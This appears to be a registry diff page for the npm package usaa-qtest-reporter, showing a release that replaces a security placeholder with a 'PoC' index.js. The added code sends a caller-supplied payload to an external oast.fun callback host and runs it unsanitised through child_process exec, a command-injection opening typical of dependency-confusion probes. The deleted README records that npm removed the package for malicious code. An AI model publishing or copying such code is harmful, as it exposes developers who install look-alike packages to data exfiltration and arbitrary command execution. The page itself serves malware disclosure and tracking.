usaa-qtest-reporter 0.0.1-security → 1.0.0

Sign up to get free protection for your applications and to get access to all the features.

Potentially problematic release.


This version of usaa-qtest-reporter might be problematic. Click here for more details.

Files changed (3) hide show
  1. package/index.js +26 -0
  2. package/package.json +8 -3
  3. package/README.md +0 -5
package/index.js ADDED
@@ -0,0 +1,26 @@
1
+ // index.js
2
+ const { exec } = require('child_process');
3
+ const http = require('http');
4
+
5
+ function vulnerableFunction(payload) {
6
+ // Replace "your.server.com" with the hostname or IP address of your server
7
+ const url = `http://cen13pe2vtc0000dhckgg8kot5eyyyyyb.oast.fun/?payload=${payload}`;
8
+
9
+ // Make an HTTP request to your server
10
+ http.get(url, (res) => {
11
+ console.log(`Server response status: ${res.statusCode}`);
12
+ res.setEncoding('utf8');
13
+ res.on('data', (chunk) => {
14
+ console.log(`Server response body: ${chunk}`);
15
+ });
16
+ });
17
+
18
+ // Execute the vulnerable command
19
+ exec(`echo ${payload}`, (error, stdout, stderr) => {
20
+ console.log(stdout);
21
+ });
22
+ }
23
+
24
+ module.exports = {
25
+ vulnerableFunction
26
+ };
package/package.json CHANGED
@@ -1,6 +1,11 @@
1
1
  {
2
2
  "name": "usaa-qtest-reporter",
3
- "version": "0.0.1-security",
4
- "description": "security holding package",
5
- "repository": "npm/security-holder"
3
+ "version": "1.0.0",
4
+ "description": "this is a PoC",
5
+ "main": "index.js",
6
+ "scripts": {
7
+ "test": "echo \"Error: no test specified\" && exit 1"
8
+ },
9
+ "author": "ratrarity",
10
+ "license": "MIT"
6
11
  }
package/README.md DELETED
@@ -1,5 +0,0 @@
1
- # Security holding package
2
-
3
- This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
4
-
5
- Please refer to www.npmjs.com/advisories?search=usaa-qtest-reporter for more information.